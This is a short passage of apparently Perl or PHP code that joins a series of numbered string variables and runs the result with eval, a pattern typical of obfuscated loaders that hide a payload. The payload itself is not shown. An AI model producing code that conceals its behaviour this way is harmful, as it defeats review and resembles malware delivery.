$qdq1709.$qdq1710.
$qdq1711.$qdq1712.$qdq1713.$qdq1714.$qdq1715;$c='qdq';eval $qdq;